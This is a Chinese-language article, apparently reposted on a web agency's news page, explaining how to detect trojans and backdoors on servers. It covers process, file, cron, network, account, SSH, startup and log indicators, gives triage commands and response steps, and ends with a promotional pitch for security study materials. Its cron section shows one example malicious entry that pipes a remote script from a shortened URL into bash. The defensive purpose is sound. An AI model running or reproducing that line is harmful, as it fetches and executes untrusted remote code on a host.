尧图网络科技YAOTU DIGITAL 获取报价
获取报价
首页 / 资讯中心 / 文章详情

常见木马特征盘点,快速排查服务器后门

发布时间:2026/9/28 18:28:50

资讯中心
01
ARTICLE

常见木马特征盘点,快速排查服务器后门

常见木马特征盘点,快速排查服务器后门
常见木马特征盘点快速排查服务器后门前言服务器被植入木马、留下后门是运维、安全人员日常工作中高频遇到的安全事件。很多时候攻击者拿到服务器权限后不会立刻搞破坏而是悄悄种下木马、预留后门长期潜伏窃取数据、挖矿、作为跳板横向渗透。很多新手排查服务器时只会简单看一下进程很容易被伪装后的木马绕过。本文整理服务器上木马与后门最常见的特征同时附带排查思路不需要复杂工具仅凭系统自带命令就能初步筛查适合线上服务器应急排查。提示本文仅用于企业内部安全自查、学习防御思路严禁用于未授权的渗透测试未经授权扫描、入侵服务器属于违法行为。一、异常进程类木马特征木马运行必然会产生进程攻击者通常会对进程做伪装这也是最优先排查的点位。1. 进程名仿冒系统程序攻击者喜欢把木马程序命名成和系统原生进程几乎一样的名字混淆管理员视线。Linux 示例systemd→systemd-、sysytemd、systemsshd→sshd1bash→bashdWindows 示例svchost.exe、explorer.exe仿冒进程正常 svchost 会伴随对应的服务单独独立运行的 svchost 要重点怀疑。排查命令Linuxps -ef | less # 查看CPU、内存占用异常进程 top # 查看进程对应的可执行文件路径 ls -l /proc/[PID]/exe重点关注进程路径不在系统默认目录/bin、/usr/bin而是在/tmp、/var/tmp、/dev/shm、用户家目录下。2. 资源占用异常挖矿木马典型特征挖矿木马是服务器最常见木马之一特征非常明显CPU 长期 90% 以上满载服务器业务负载并不高部分挖矿木马会限制自身占用不会直接跑满但持续占用 20%~40%部分挖矿会占用大量内存磁盘读写升高。排查要点top 看到不知名进程高占用查看进程文件是否位于临时目录md5 全网比对判断是否为已知挖矿样本。3. 隐藏进程Rootkit 类木马高级 Rootkit 木马会 hook 系统调用ps、top看不到进程但实际在后台运行。排查思路查看/proc目录枚举 PID比对 ps 输出找出 ps 看不到的 PID使用lsattr检查文件隐藏属性检查内核模块lsmod陌生 ko 内核模块高度可疑。二、恶意文件特征木马 / 后门文件藏身点攻击者偏爱放在可写、容易被忽略的临时目录这些目录经常被清理也容易被管理员忽略。1. 高危目录清单重点排查Linux 服务器重点目录/tmp、/var/tmp、/dev/shm、/root/.隐藏目录、/home/*/.隐藏目录、/usr/local/bin、/etc/cron.dWindows 服务器重点目录C:\Temp、C:\Windows\Temp、AppData\Roaming、ProgramData2. 文件特征隐藏文件Linux 以.开头隐藏文件例如.backdoor.sh、.minerWindows 设置隐藏属性文件。时间异常文件文件修改时间和正常业务文件时间差异巨大或者大量文件时间被篡改。# 查找最近24小时新增文件 find /tmp -type f -mtime -1奇怪文件名乱码文件名、空白文件名、特殊不可见字符文件名。文件权限异常木马脚本经常赋予 777 最高权限。find /tmp -perm 777二进制文件无版本信息、无签名、文件体积很小静态扫描存在恶意字符串connect、reverse、shell、backdoor。三、计划任务后门持久化木马重灾区攻击者拿到服务器权限第一件事往往是添加定时任务保证木马重启后自动运行这是最容易忽略的后门。Linux 计划任务排查点位用户级 crontabcrontab -l查看当前用户定时任务root 用户必须重点检查系统定时任务目录/etc/crontab /etc/cron.d/* /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/恶意定时任务典型特征定时执行 wget/curl 下载远程脚本任务执行地址为陌生外网 IP、域名任务执行脚本放在 /tmp、/dev/shm任务里面有 base64 编码字符串直接解码执行 shell。示例恶意 crontab*/5 * * * * root curl shturl.cc/0AgLrcGkubBl | bashWindows 计划任务任务计划程序中不知名任务触发条件为开机 / 登录启动程序路径在 Temp 目录。四、网络连接特征反弹 Shell、远控木马木马本质大多需要和攻击者服务器通信查看网络连接可以快速定位后门。常见恶意网络特征陌生外网出站连接服务器主动对外发起连接业务没有这个对外访问需求长期存在的 ESTABLISHED 稳定长连接大概率是反弹 shell、远控木马监听端口异常陌生端口本地监听非业务端口。Linux 排查命令# 查看所有网络连接 netstat -antlp # 新版推荐ss ss -antlp重点观察进程 PID 程序名称外部 IP 是否为恶意 IP 段业务不需要监听端口却在监听。注意部分木马会使用 UDP 通信不要只看 TCP。五、账号与 SSH 后门特征很多后门不依靠木马程序直接留下账号后门属于服务器高频后门类型。新增可疑账号Linuxcat /etc/passwd查看 UID0 的账号root 权限账号除 root 以外其他 UID0 账号都是后门。awk -F: $30 {print} /etc/passwdWindows查看本地管理员组陌生管理员账号。SSH 后门未知公钥写入~/.ssh/authorized_keys修改 sshd 配置开启弱密码、允许 root 远程登录替换 ssh 二进制文件伪造 ssh 后门。排查查看所有用户目录下.ssh文件夹检查 authorized_keys 里面陌生公钥。六、系统启动项、服务类木马持久化Linux/etc/rc.local里面恶意执行脚本systemd 服务/etc/systemd/system/下陌生 service 单元开机自动启动恶意程序。systemctl list-unit-filesWindows注册表启动项、服务、WMI 事件订阅都是木马持久化手段。七、日志异常辅助判断木马入侵往往会篡改日志日志本身的异常也可以作为木马特征日志被清空、大量日志缺失日志时间跳变存在大量失败登录紧接着出现一次成功登录大量 wget/curl 下载记录、bash 执行记录。Linux 查看登录日志last lastlog八、快速排查简易检查清单应急直接复制使用应急排查服务器后门按顺序执行快速初筛查看 CPU 内存异常进程top查看可疑进程的 exe 链接扫描临时目录/tmp /dev/shm /var/tmp查找最近新增文件查看所有用户 crontab 和 /etc/cron.d 目录检查所有用户的 ssh 公钥 authorized_keys查找 passwd 中 UID 为 0 账号ss/netstat 查看异常出站、监听端口检查 systemd 服务、rc.local 启动脚本查看登录日志 last、lastlog判断入侵时间点。九、发现木马后门之后的应急建议不要直接重启服务器很多木马重启后会丢失现场优先保留证据隔离主机断开网络避免横向渗透内网其他服务器保留样本对恶意文件做 hash 备份不要直接在线执行溯源分析判断入侵入口是弱密码、漏洞上传还是 webshell清除后门只删除文件不够定时任务、账号、ssh 密钥、服务都要清理干净修复漏洞修改所有账号强密码加固 SSH 策略。结尾服务器木马和后门种类繁多攻击者手段一直在更新但万变不离其宗进程、文件、网络、持久化、账号这五大维度。日常巡检养成定期检查这几项的习惯可以提前发现潜伏木马而不是等到挖矿、数据泄露事件爆发才应急处理。安全排查没有银弹本文的特征盘点是基础排查手段。遇到高级 Rootkit、内存无文件木马时还需要内存取证、专业 EDR 工具深度分析。免责声明本文内容仅用于安全学习与企业授权范围内服务器安全自查任何未经授权对服务器进行入侵、后门植入、恶意测试行为需要承担相应法律责任。了解网络安全首先要搞清楚下面这些前提网络安全到底包含哪些技术是否需要会编程网络安全行业有哪些职业方向“我”该如何选择网络安全的职业发展和成长路线是什么如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
02
RELATED NEWS

相关资讯

更多网站建设与数字化升级内容

03
WHY YAOTU

想打造同款高转化官网?

懂行业、懂生意,从建站到增长一站式陪跑

◈

场景化定制

不做模板站,围绕你的业务场景量身设计,小众不撞款。

◐

营销型架构

以转化目标组织内容与路径,让官网真正带来询盘。

▲

全周期服务

设计、开发、运营、运维一体,上线只是开始。

免费获取你的建站方案

留下需求,专属顾问 24 小时内为你输出方案建议。